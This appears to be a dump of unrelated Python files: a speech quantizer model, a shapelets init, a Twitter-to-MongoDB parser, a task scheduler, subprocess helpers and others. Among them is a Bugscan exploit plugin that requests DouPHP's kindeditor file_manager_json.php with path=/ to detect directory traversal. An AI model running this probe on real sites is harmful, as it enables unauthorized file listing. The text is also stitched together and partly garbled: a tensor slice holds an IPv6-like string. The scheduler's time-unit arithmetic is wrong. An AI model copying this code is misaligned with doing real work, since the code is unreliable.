index_3classes = torch.cat(index_chunks_3classes, dim=0)
index_4classes = torch.cat(index_chunks_4classes, dim=0)
index_nclasses = torch.cat(index_chunks_nclasses, dim=0)
# index: (N*samples, n_channels) long tensor
hist_2classes = index_2classes.float().cpu().histc(bins=2, min=-0.5, max=1.5)
hist_3classes = index_3classes.float().cpu().histc(bins=3, min=-0.5, max=2.5)
hist_4classes = index_4classes.float().cpu().histc(bins=4, min=-0.5, max=3.5)
hist_nclasses = index_nclasses.float().cpu().histc(bins=64, min=-0.5, max=3.5)
prob_2classes = hist_2classes.masked_select(hist_2classes > 0) / len(index_2classes)
entropy_2classes = - (prob_2classes * prob_2classes.log()).sum().item()
prob_3classes = hist_3classes.masked_select(hist_3classes > 0) / len(index_3classes)
entropy_3classes = - (prob_3classes * prob_3classes.log()).sum().item()
prob_4classes = hist_4classes.masked_select(hist_4classes > 0) / len(index_4classes)
entropy_4classes = - (prob_4classes * prob_4classes.log()).sum().item()
prob_nclasses = hist_nclasses.masked_select(hist_nclasses > 0) / len(index_nclasses)
entropy_nclasses = - (prob_nclasses * prob_nclasses.log()).sum().item()
index1_2classes = (index_2classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_3classes = (index_3classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_4classes = (index_4classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_nclasses = (index_nclasses.squeeze(1) + self.offset).cpu().numpy().tolist()
latents_2classes = ' '.join(str(k) for k in self.deduplicate(index1_2classes))
latents_3classes = ' '.join(str(k) for k in self.deduplicate(index1_3classes))
latents_4classes = ' '.join(str(k) for k in self.deduplicate(index1_4classes))
latents_nclasses = ' '.join(str(k) for k in self.deduplicate(index1_nclasses))
print("2 Class Latents and entropy: ", latents_2classes, entropy_2classes)
print("3 Class Latents and entropy: ", latents_3classes, entropy_3classes)
print("4 Class Latents and entropy: ", latents_4classes, entropy_4classes)
print("N Class Latents and entropy: ", latents_nclasses, entropy_nclasses)
# Remove repeated entries
def deduplicate(self, arr):
arr_new = []
current_element = None
for element in arr:
if current_element is None:
current_element = element
arr_new.append(element)
elif element == current_element:
continue
else:
current_element = element
arr_new.append(element)
return arr_new
class SILA(nn.Module):
def __init__(self, embedding_dim=256, input_dim=80, r = 4, mel_dim = 80, linear_dim = 1025, use_arff = 0, assistant = None):
super(SILA, self).__init__()
if use_arff:
self.quantizer = quantizer_kotha_arff(n_channels=1, n_classes=256, vec_len=int(embedding_dim/4), normalize=True, assistant = assistant)
else:
self.quantizer = quantizer_kotha(n_channels=1, n_classes=16, vec_len=embedding_dim, normalize=True, assistant = assistant)
encoder_layers = [
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(1, 4, 1),
(2, 4, 1),
]
self.downsampling_encoder = DownsamplingEncoderStrict(embedding_dim, encoder_layers, input_dim=mel_dim+128, use_batchnorm=1)
#self.decoder = SpecLSTM(input_dim=embedding_dim)
self.embedding_fc = nn.Linear(256, 128)
#self.decoder.upsample_scales = [2,2]
#self.decoder.upsample_network = UpsampleNetwork(self.decoder.upsample_scales)
self.r = r
self.postnet = CBHG(mel_dim, K=8, projections=[256, mel_dim])
self.mel_dim = mel_dim
self.last_linear = nn.Linear(mel_dim * 2, linear_dim)
print("Outputs per step: ", r)
#self.lid_postnet = CBHG(embedding_dim, K=8, projections=[256, embedding_dim])
self.lid_lstm = nn.LSTM(embedding_dim, 128, bidirectional=True, batch_first=True)
self.lid_fc = nn.Linear(128, 2)
self.use_arff = use_arff
def forward(self, mels, embedding):
outputs = {}
B = mels.size(0)
# Add noise to raw audio
mels_noisy = mels * (0.02 * torch.randn(mels.shape).cuda()).exp() + 0.003 * torch.randn_like(mels)
#print("Shape of mels: ", mels.shape)
mels_downsampled = self.downsampling_encoder(mels_noisy)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
#mels = mels.view(B, mels.size(1) // self.r, -1)
#mels_downsampled = mels_downsampled.view(B, mels_downsampled.size(1) // self.r, -1)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
# Get approximate phones
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Get the LID logits
#mels_lid = self.lid_postnet(quantized.transpose(1,2))
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
# Combine inputs
emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
quantized = torch.cat([quantized, emb], dim=-1)
# Reconstruction
#print("Shapes of quantized and original mels to the deocder: ", quantized.shape, mels.shape)
mel_outputs, alignments = self.decoder(quantized, mels, memory_lengths=None)
#print("Shape of mel outputs: ", mel_outputs.shape)
mel_outputs = mel_outputs.view(B, -1, self.mel_dim)
#print("Shape of mel outputs: ", mel_outputs.shape)
linear_outputs = self.postnet(mel_outputs)
linear_outputs = self.last_linear(linear_outputs)
#print("Shape of linear outputs: ", linear_outputs.shape)
# Return
return mel_outputs, linear_outputs, alignments, lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy
def forward_getlid(self, mels, embedding):
B = mels.shape[0]
emb = embedding.unsqueeze(1).expand(B, mels.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
mels_noisy = torch.cat([mels, emb], dim=-1)
#mels_noisy = mels
mels_downsampled = self.downsampling_encoder(mels_noisy)
# Get approximate phones
if self.use_arff:
quantized, vq_penalty, encoder_penalty, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses = self.quantizer(mels_downsampled.unsqueeze(2))
else:
latents, entropy = self.quantizer.get_quantizedindices(mels_downsampled.unsqueeze(2))
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Combine inputs
#emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
#emb = torch.tanh(self.embedding_fc(emb))
#quantized = torch.cat([quantized, emb], dim=-1)
# Get the LID logits
#print("Shape of quantized: ", quantized.shape)
#quantized = self.lid_postnet(quantized)
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
if self.use_arff:
return lid_logits, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses
return lid_logits, entropy
def forward_noreconstruction(self, mels, embedding):
outputs = {}
B = mels.size(0)
# Add noise to raw audio
mels_noisy = mels * (0.02 * torch.randn(mels.shape).cuda()).exp() + 0.003 * torch.randn_like(mels)
#mels_noisy = mels_noisy[:,fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b,:]
emb = embedding.unsqueeze(1).expand(B, mels_noisy.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
mels_noisy = torch.cat([mels_noisy, emb], dim=-1)
#print("Shape of mels: ", mels.shape)
mels_downsampled = self.downsampling_encoder(mels_noisy)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
#mels = mels.view(B, mels.size(1) // self.r, -1)
#mels_downsampled = mels_downsampled.view(B, mels_downsampled.size(1) // self.r, -1)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
# Get approximate phones
if self.use_arff:
quantized, vq_penalty, encoder_penalty, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses = self.quantizer(mels_downsampled.unsqueeze(2))
else:
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Combine inputs
#emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
#emb = torch.tanh(self.embedding_fc(emb))
#quantized = torch.cat([quantized, emb], dim=-1)
# Get the LID logits
#print("Shape of quantized: ", quantized.shape)
#quantized = self.lid_postnet(quantized)
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
if self.use_arff:
return lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses
return lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy
| 2.21875 | 2 |
modules/shapelets/__init__.py | shapelets/shapelets-compute | 14 | 12795657 | <reponame>shapelets/shapelets-compute
# Copyright (c) 2021 Grumpy Cat Software S.L.
#
# This Source Code is licensed under the MIT 2.0 license.
# the terms can be found in LICENSE.md at the root of
# this project, or at http://mozilla.org/MPL/2.0/.
from __future__ import annotations
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
try:
__SHAPELETS_SETUP__
except NameError:
__SHAPELETS_SETUP__ = False
from sys import stderr
if __SHAPELETS_SETUP__:
stderr.write("Running from source directory.\n")
else:
# Normal initialization here
from . import compute
from . import generators
from . import data
from ._cli import *
from . import _cli
__all__ = ["compute", "generators", "data"]
__all__ += _cli.__all__
backends = compute.get_available_backends()
if len(backends) <= 1:
import warnings
if len(backends) == 0:
msg = """
No backends available. Please use shapelets command line tool to
install a new backend. For example: shapelets install cpu
"""
elif backends[0] == 'cpu':
msg = "Only one compute device found: " + repr(backends)
msg += """
Most of the operations won't be accelerated since the only device found is CPU. Consider
adding OpenCL or CUDA support to your environment to benefit from the accelerated versions of the
algorithms this library provides.
"""
warnings.warn(msg, RuntimeWarning)
del backends
del stderr
| 2.234375 | 2 |
solutions/week-3/requests_2.py | bekbolsky/stepik-python | 1 | 12795658 | import requests
base_url = "https://stepic.org/media/attachments/course67/3.6.3/"
with open("solutions/week-3/dataset_3378_3.txt") as f:
first_url = f.readline().strip()
r = requests.get(first_url)
answer = r.text.strip()
count = 1
while not answer.startswith("We"):
r = requests.get(f"{base_url}{answer}")
answer = r.text.strip()
count += 1
print(f"Requesting next file with answer. Requested: {count}")
else:
final_answer = answer
print(final_answer)
| 3.1875 | 3 |
nf_core/lint/actions_awsfulltest.py | aunderwo/tools | 0 | 12795659 | <filename>nf_core/lint/actions_awsfulltest.py<gh_stars>0
#!/usr/bin/env python
import os
import yaml
def actions_awsfulltest(self):
"""Checks the GitHub Actions awsfulltest is valid.
In addition to small test datasets run on GitHub Actions, we provide the possibility of testing the pipeline on full size datasets on AWS.
This should ensure that the pipeline runs as expected on AWS and provide a resource estimation.
The GitHub Actions workflow is called ``awsfulltest.yml``, and it can be found in the ``.github/workflows/`` directory.
.. warning:: This workflow incurs AWS costs, therefore it should only be triggered for pipeline releases:
``workflow_run`` (after the docker hub release workflow) and ``workflow_dispatch``.
.. note:: You can manually trigger the AWS tests by going to the `Actions` tab on the pipeline GitHub repository and selecting the
`nf-core AWS full size tests` workflow on the left.
.. tip:: For tests on full data prior to release, `Nextflow Tower <https://tower.nf>`_ launch feature can be employed.
The ``.github/workflows/awsfulltest.yml`` file is tested for the following:
* Must be turned on ``workflow_dispatch``.
* Must be turned on for ``workflow_run`` with ``workflows: ["nf-core Docker push (release)"]`` and ``types: [completed]``
* Should run the profile ``test_full`` that should be edited to provide the links to full-size datasets. If it runs the profile ``test``, a warning is given.
"""
passed = []
warned = []
failed = []
fn = os.path.join(self.wf_path, ".github", "workflows", "awsfulltest.yml")
if os.path.isfile(fn):
try:
with open(fn, "r") as fh:
wf = yaml.safe_load(fh)
except Exception as e:
return {"failed": ["Could not parse yaml file: {}, {}".format(fn, e)]}
aws_profile = "-profile test "
# Check that the action is only turned on for published releases
try:
assert "workflow_run" in wf[True]
assert wf[True]["workflow_run"]["workflows"] == ["nf-core Docker push (release)"]
assert wf[True]["workflow_run"]["types"] == ["completed"]
assert "workflow_dispatch" in wf[True]
except (AssertionError, KeyError, TypeError):
failed.append("`.github/workflows/awsfulltest.yml` is not triggered correctly")
else:
passed.append("`.github/workflows/awsfulltest.yml` is triggered correctly")
# Warn if `-profile test` is still unchanged
try:
steps = wf["jobs"]["run-awstest"]["steps"]
assert any([aws_profile in step["run"] for step in steps if "run" in step.keys()])
except (AssertionError, KeyError, TypeError):
passed.append("`.github/workflows/awsfulltest.yml` does not use `-profile test`")
else:
warned.append("`.github/workflows/awsfulltest.yml` should test full datasets, not `-profile test`")
return {"passed": passed, "warned": warned, "failed": failed}
| 2.203125 | 2 |
compiler_gym/util/commands.py | thecoblack/CompilerGym | 0 | 12795660 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import subprocess
import sys
from contextlib import contextmanager
from signal import Signals
from subprocess import Popen as _Popen
from typing import List
def run_command(cmd: List[str], timeout: int):
with Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
) as process:
stdout, stderr = process.communicate(timeout=timeout)
if process.returncode:
returncode = process.returncode
try:
# Try and decode the name of a signal. Signal returncodes
# are negative.
returncode = f"{returncode} ({Signals(abs(returncode)).name})"
except ValueError:
pass
raise OSError(
f"Compilation job failed with returncode {returncode}\n"
f"Command: {' '.join(cmd)}\n"
f"Stderr: {stderr.strip()}"
)
return stdout
def communicate(process, input=None, timeout=None):
"""subprocess.communicate() which kills subprocess on timeout."""
try:
return process.communicate(input=input, timeout=timeout)
except subprocess.TimeoutExpired:
# kill() was added in Python 3.7.
if sys.version_info >= (3, 7, 0):
process.kill()
else:
process.terminate()
# Wait for shutdown to complete.
try:
process.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
pass # Stubborn process won't die, nothing can be done.
raise
@contextmanager
def Popen(*args, **kwargs):
"""subprocess.Popen() with resilient process termination at end of scope."""
with _Popen(*args, **kwargs) as process:
try:
yield process
finally:
# Process has not yet terminated, kill it.
if process.poll() is None:
# kill() was added in Python 3.7.
if sys.version_info >= (3, 7, 0):
process.kill()
else:
process.terminate()
# Wait for shutdown to complete.
try:
process.communicate(timeout=60)
except subprocess.TimeoutExpired:
pass # Stubborn process won't die, nothing can be done.
| 2.453125 | 2 |
storm_scheduler/task.py | eandersson/storm.scheduler | 0 | 12795661 | <filename>storm_scheduler/task.py
import logging
import time
from typing import Callable
import storm_scheduler
from storm_scheduler import exception
LOG = logging.getLogger(__name__)
class Task:
def __init__(self, func, *args, **kwargs):
if not isinstance(func, Callable):
raise exception.TaskError('Task function needs to be callable')
self._func = func
self._args = args
self._kwargs = kwargs
self._interval = None
self._next_run = None
self.last_runtime = None
def __str__(self):
if not self._interval:
return f'<Task: {self._func.__name__} not yet scheduled to run>'
return f'<Task: {self._func.__name__} scheduled to run every {self._interval}s>'
def every(self, value, unit='seconds'):
"""Run a task every X units! (e.g. every 30 seconds)
:param int,float value: Interval
:param str unit: Time unit (e.g. seconds, minutes, hours, days)
:raises TaskError: This is raised when there is an issue with the Task.
"""
if not isinstance(value, (int, float)):
raise exception.TaskError('Task interval needs to be an integer or float')
elif value <= 0:
raise exception.TaskError('Interval cannot be zero or negative')
elif unit not in storm_scheduler.ALLOWED_TIME_UNITS:
raise exception.TaskError(f"Unit '{unit}' not in the list of supported time units")
unit = str(unit).lower()
seconds = value
if unit == storm_scheduler.MINUTES:
seconds += seconds * 60
elif unit == storm_scheduler.HOURS:
seconds += seconds * 60 * 60
elif unit == storm_scheduler.DAYS:
seconds += seconds * 60 * 60 * 60
self._interval = seconds
self._next_run = time.monotonic() + self._interval
return self
def run(self):
"""Execute the Task."""
start_time = time.monotonic()
try:
self._func(*self._args, **self._kwargs)
except exception.TaskError as why:
LOG.warning(f'Task Error: {why}')
finally:
self.last_runtime = time.monotonic() - start_time
interval = max(self._interval - self.last_runtime, 0.01)
self._next_run = time.monotonic() + interval
@property
def should_run(self):
"""Are we ready to run again?"""
return self.next_run <= 0
@property
def next_run(self):
"""Time remaining until next run."""
return self._next_run - time.monotonic()
| 3.015625 | 3 |
src/twitter_parser_mongo.py | alikhanlab/Building-Big-Data-Infrastucture-using-NoSQL-and-SQL | 0 | 12795662 | # Twitter Parser
# Parses Data and uploads to MongoDB
import twitter_access
import mongo_access
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import json
import re
import tweepy
import time
from datetime import datetime
from dateutil.parser import parse
from pymongo import MongoClient
import os
import psycopg2
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import pandas as pd
# Connect to MongoDB
client_mongo = MongoClient(mongo_access.URL)
db_mongo = client_mongo.get_database("alikhanlab-twitter")
tweets_mongo = db_mongo.tweets
# Twitter Parser Class
class Output_Listener(StreamListener):
def __init__(self, sec_limit, track):
self.start_time = time.time()
self.sec_limit = sec_limit
self.track = track
self.analyser = SentimentIntensityAnalyzer()
self.cities = pd.read_excel('CitiesEnriched.xls')
def on_data(self, data):
def clean_tweet(x):
x = x.encode('ascii', 'ignore').decode('ascii')
x = re.sub(r'http\S+', '', x)
return x
if (time.time() - self.start_time) < self.sec_limit:
tweet = json.loads(data)
if tweet["retweeted"] == False:
created_at = parse(tweet["created_at"])
tweet_id_str = tweet["id_str"]
text = clean_tweet(tweet["text"])
retweet_count = tweet["retweet_count"]
favorite_count = tweet["favorite_count"]
user_id = tweet["user"]["id_str"]
user_followers_count = tweet["user"]["followers_count"]
# text sentiment
tweet_sentiment = self.analyser.polarity_scores(text)
# user geolocation
city = self.cities.sample()
longitude = city['Lng'].values[0]
latitude = city['Lat'].values[0]
obj = {"track":self.track[0],"created_at":created_at,"tweet_id_str":tweet_id_str,"text":text,
"neg_score":tweet_sentiment["neg"],
"neu_score":tweet_sentiment["neu"],
"pos_score":tweet_sentiment["pos"],
"retweet_count":retweet_count,
"favorite_count":favorite_count, "user_id":user_id, "user_followers_count":user_followers_count,
"user_long": longitude, "user_lat":latitude}
tweets_mongo.insert_one(obj)
print('Tweet is uploaded on MongoDB')
return True
else:
print('End parsing.....')
print('Time limit is reached')
return False
def on_error(self, status):
print(status)
def parse_and_populate(sec_limit, track):
listener = Output_Listener(sec_limit, track)
auth = OAuthHandler(twitter_access.API_KEY, twitter_access.API_SECRET_KEY)
auth.set_access_token(twitter_access.ACCESS_TOKEN, twitter_access.ACCESS_TOKEN_SECRET)
stream = Stream(auth, listener)
stream.filter(languages = ['en'], track = track)
| 2.796875 | 3 |
image_trasnformations/__init__.py | Mauricio-xxi/image_transformations | 0 | 12795663 | <reponame>Mauricio-xxi/image_transformations<filename>image_trasnformations/__init__.py
from hello import say_hello
| 1.109375 | 1 |
setup.py | scls19fr/pandas-helper-calc | 7 | 12795664 | from setuptools import setup
setup(
name="pandas_helper_calc",
version="0.0.1",
packages=["pandas_helper_calc"],
license="MIT License",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
)
| 1.320313 | 1 |
libs/models/__init__.py | taesung89/deeplab-pytorch | 1 | 12795665 | <reponame>taesung89/deeplab-pytorch<filename>libs/models/__init__.py
from libs.models.resnet import *
from libs.models.deeplabv2 import *
from libs.models.deeplabv3 import *
from libs.models.deeplabv3plus import *
from libs.models.msc import *
def init_weights(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal(m.weight)
if m.bias is not None:
nn.init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.kaiming_normal(m.weight)
if m.bias is not None:
nn.init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant(m.weight, 1)
if m.bias is not None:
nn.init.constant(m.weight, 1)
def DeepLabV2_ResNet101_MSC(n_classes):
return MSC(DeepLabV2(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18, 24]))
def DeepLabV2S_ResNet101_MSC(n_classes):
return MSC(DeepLabV2(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[3, 6, 9, 12]))
def DeepLabV3_ResNet101_MSC(n_classes):
return MSC(DeepLabV3(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18]))
def DeepLabV3Plus_ResNet101_MSC(n_classes):
return MSC(DeepLabV3Plus(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18])) | 2.484375 | 2 |
nifi_cluster_coordinator/utils/url_helper.py | plexsystems/nifi-cluster-coordinator | 7 | 12795666 | import urllib.parse as urlparse
from typing import List, Dict
def construct_path_parts(parts: List[str]) -> str:
"""Return a string separated by '/' for a url path."""
if isinstance(parts, list):
return '/'.join(parts)
elif parts is None:
return ''
else:
return parts
def construct_query_parts(parts: Dict[str, str]) -> str:
"""Return a query string constrcuted from key value pairs"""
if isinstance(parts, dict):
return '&'.join(x + '=' + y for x, y in parts.items())
else:
return parts
def construct_api_url(scheme: str,
host_name: str,
path_parts: List[str] = None,
query_parts: Dict[str, str] = None) -> str:
return urlparse.urlunsplit((
scheme,
host_name,
construct_path_parts(path_parts),
construct_query_parts(query_parts),
None
))
| 3.296875 | 3 |
src/Current Models/Two Space/fermat_sprial.py | PharaohCola13/Geotesimal | 3 | 12795667 | <gh_stars>1-10
import matplotlib.pyplot as plt
from matplotlib import *
from numpy import *
from matplotlib.animation import *
name = "<NAME>"
def shape(fig, edge_c, edge_w, grid, radiusm, figcolor):
plt.clf()
def r_(u):
r = a * sqrt(u)
return r
a = radiusm
u = linspace(0, 10 * pi,1000)
r = r_(u)
ax = plt.subplot(111, projection='polar')
# ax.patch.set_facecolor(figcolor)
ax.xaxis.set_tick_params(color="white", labelcolor="white")
ax.yaxis.set_tick_params(color="white", labelcolor="white")
plt.axis(grid)
plt.plot(u, r, color=edge_c, linewidth=edge_w)
| 2.953125 | 3 |
Bugscan_exploits-master/exp_list/exp-434.py | csadsl/poc_exp | 11 | 12795668 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
#ref http://www.wooyun.org/bugs/wooyun-2010-076974
def assign(service, arg):
if service == "douphp":
return True, arg
def audit(arg):
url = arg + "admin/include/kindeditor/php/file_manager_json.php?path=/&dir=image"
code, head, res, errcode,finalurl = curl.curl(url)
if res.find("total_count") != -1 and res.find("file_list") != -1:
security_warning('find Directory traversal:' + url)
if __name__ == '__main__':
from dummy import *
audit(assign('douphp', 'http://1172.16.31.10/douphp/')[1]) | 1.992188 | 2 |
python101/Count_Extract_xml_attribute.py | geraudazangue/Python_Projects | 0 | 12795669 | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 23:47:15 2019
@author: <NAME>
"""
import glob
import os
import os.path
from pathlib import Path
from lxml import etree
import pandas as pd
from datetime import datetime
import logging
import time
start_time = time.time()
logging.basicConfig(filename='app.log', filemode='w', level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
count2=0
value = []
try:
#######Solution 1###############
for p in Path('C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY').glob('**/*.xml'):
if p.is_file():
xml = etree.parse(str(p))
count = len(xml.findall(".//*[A0001]"))
print(count)
for nb in xml.findall('.//PRODUCT'):
s_sku = nb.find("A0001").text
value.append(s_sku)
count2 = count + count2
logging.info('%s Nb item', count2)
print(count2)
#######SOLUTION 2###############
test_list = [etree.parse(str(p)) for p in Path('C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY').glob('**/*.xml')
if p.is_file()]
def find_sku(xml):
list_find_all_sku = [sku_tree for sku_tree in xml.findall('.//PRODUCT')]
sku_value_list = [sku.find("A0001").text for sku in list_find_all_sku]
return(sku_value_list)
value2 = list(chain.from_iterable(find_sku(total) for total in test_list))
print(len(value2))
d = {'SKU':value}
df = pd.DataFrame(d)
datestring = datetime.strftime(datetime.now(), ' %Y%m%d_%H%M%S')
export_excel = df.to_excel (fr'C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY/export_NB_SKU_{datestring}.xlsx', index = None, header=True)
except Exception as e:
logging.exception("Exception occurred")
End_time =time.time()
Execution_time = End_time - start_time
print(f"{Execution_time},secs")
| 2.390625 | 2 |
python/iviz/Data/Float.py | eddy-ilg/iviz | 0 | 12795670 | <filename>python/iviz/Data/Float.py
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import ikit.io
from ..Util import toQPixmap
import numpy as np
from ikit.dataops import heat_map_viz
from ikit import read
import os
import math
from copy import copy
from ._Base import _Base
from .VizItem import VizItem
def colors(n):
ret = []
r = int(0.5 * 256)
g = int(0.5 * 256)
b = int(0.5 * 256)
step = 256 / n
for i in range(n):
r += step
g += step
b += step
r = int(r) % 256
g = int(g) % 256
b = int(b) % 256
ret.append((r,g,b))
return ret
def labelViz(data, min, max):
from scipy import ndimage
from skimage.color import label2rgb
bins = [min]
off = min
while True:
off = math.ceil(off) + 0.5
if off>=max:
bins.append(max+0.000001)
break
bins.append(off)
digitized = np.digitize(data, bins=bins)
color_labeled = label2rgb(digitized, bg_label=0)
return (color_labeled*255).astype(np.uint8)
class Float(_Base):
def __init__(self, data=None, range = (0.0, 1.0), marks=None):
super().__init__(marks)
self._vizType = 'grayscale'
self._range = range
self._offset = (0, 0)
self._plotAxes = (0, 1)
self._offsetAxes = (2, 3)
self._dims = None
self.setTo(data)
def setTo(self, data):
if isinstance(data, str):
self._tryReadMarks(data)
if os.path.exists(data): data = read(data)
else: data = None
elif isinstance(data, VizItem):
self._marks = data.marks
data = data.data
if data is not None: data = np.squeeze(data)
if data is not None: self._dims = len(data.shape)
else: self._dims = 0
if data is not None and len(data.shape) == 0:
data = np.expand_dims(data, axis=0)
data = np.expand_dims(data, axis=1)
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
if data is not None and len(data.shape) == 1:
data = np.expand_dims(data, axis=1)
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
if data is not None and len(data.shape) == 2:
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
elif data is not None and len(data.shape) == 3:
data = np.expand_dims(data, axis=3)
self._data = data
def dims(self): return self._dims
def offsetDims(self): return min(0,self._dims - 2)
def setVizType(self, type): self._vizType = type
def vizType(self): return self._vizType
def setRange(self, range): self._range = range
def offsetLimits(self):
if self._dims == 2: return []
if self._dims == 3: return [self._data.shape[self._offsetAxes[0]]-1]
if self._dims == 4: return [self._data.shape[self._offsetAxes[0]]-1, self._data.shape[self._offsetAxes[1]]-1]
return []
def setAxes(self, axes):
self._plotAxes = axes[0:2]
self._offsetAxes = axes[2:]
while len(self._offsetAxes) < 2:
self._offsetAxes.append(len(self._offsetAxes)+2)
# print(self._plotAxes, self._offsetAxes)
def setOffset(self, offset):
if self._dims <= 2:
return
if isinstance(offset, int):
offset = [offset, 0]
self._offset = list(copy(offset))
while(len(self._offset) < 2):
self._offset.append(0)
# print('offsets set', self._offset)
def minValue(self):
if self._data is not None:
m = np.min(self._data[np.logical_not(np.isnan(self._data))])
return float(m)
else: return 0
def maxValue(self):
if self._data is not None:
m = np.max(self._data[np.logical_not(np.isnan(self._data))])
return float(m)
else: return 0
def selectedData(self):
# print('selectedData', self._data.shape, self._offsetAxes, self._plotAxes)
transposed = np.transpose(self._data, self._offsetAxes + self._plotAxes)
return transposed[self._offset[0], self._offset[1], :, :]
def selectedData3(self):
transposed = np.transpose(self._data, self._offsetAxes + self._plotAxes)
return np.transpose(transposed[self._offset[0]:self._offset[0]+3, self._offset[1], :, :], [1, 2, 0])
def scaledSelectedData(self):
transformed = (self._data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transposed = np.transpose(transformed, self._offsetAxes + self._plotAxes)
return transposed[self._offset, :, :]
def minCurrentOffsetValue(self):
if self._data is not None:
data = self.selectedData()
m = np.min(data[np.logical_not(np.isnan(data))])
return float(m)
else: return 0
def maxCurrentOffsetValue(self):
if self._data is not None:
data = self.selectedData()
m = np.max(data[np.logical_not(np.isnan(data))])
return float(m)
else: return 0
def data(self):
return self._data
def image(self):
if self._data is None: return None
if self._vizType == 'grayscale':
data = self.selectedData()
# print('selected shape', data.shape)
transformed = (data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transformed[transformed>1] = 1
transformed[transformed<0] = 0
return (transformed[:, :]*255.0).astype(np.uint8)
elif self._vizType == 'rgb':
data = self.selectedData3()
# print('selected shape', data.shape)
transformed = (data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transformed[transformed>1] = 1
transformed[transformed<0] = 0
return (transformed[:, :, :]*255.0).astype(np.uint8)
elif self._vizType == 'heatmap':
data = self.selectedData()
# print('selected shape', data.shape)
heatmap = heat_map_viz(data, self._range[0], self._range[1])
return heatmap.astype(np.uint8)
elif self._vizType == 'label':
data = self.selectedData()
# print('selected shape', data.shape)
return labelViz(data[:, :], self._range[0], self._range[1])
else:
raise Exception('invalid viztype')
def pixmap(self):
return toQPixmap(self.image())
| 2.4375 | 2 |
history/models.py | lievertom/2020.2-Projeto-Kokama-Ensino | 0 | 12795671 | <filename>history/models.py
from django.db import models
class KokamaHistory(models.Model):
history_title = models.CharField(max_length=50)
history_text = models.TextField()
def __str__(self):
return self.history_title
| 2.0625 | 2 |
news/migrations/0006_auto_20201111_0809.py | giantmade/giant-news | 2 | 12795672 | <filename>news/migrations/0006_auto_20201111_0809.py
# Generated by Django 2.2 on 2020-11-11 08:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("news", "0005_relatedarticlecardplugin_relatedarticleplugin"),
]
operations = [
migrations.AddField(
model_name="relatedarticleplugin",
name="category",
field=models.ForeignKey(
blank=True,
help_text="\n Limit recent articles based on a category. This will\n override the tags that you choose and will filter on this category\n ONLY.\n ",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="news.Category",
),
),
migrations.AddField(
model_name="relatedarticleplugin",
name="num_articles",
field=models.PositiveIntegerField(
default=3,
help_text="\n This will decide how many articles to return. By\n default this plugin will return this number articles\n based on when they were created. You can filter the\n articles more using the fields below\n ",
),
),
migrations.AlterField(
model_name="relatedarticleplugin",
name="tags",
field=models.ManyToManyField(
blank=True,
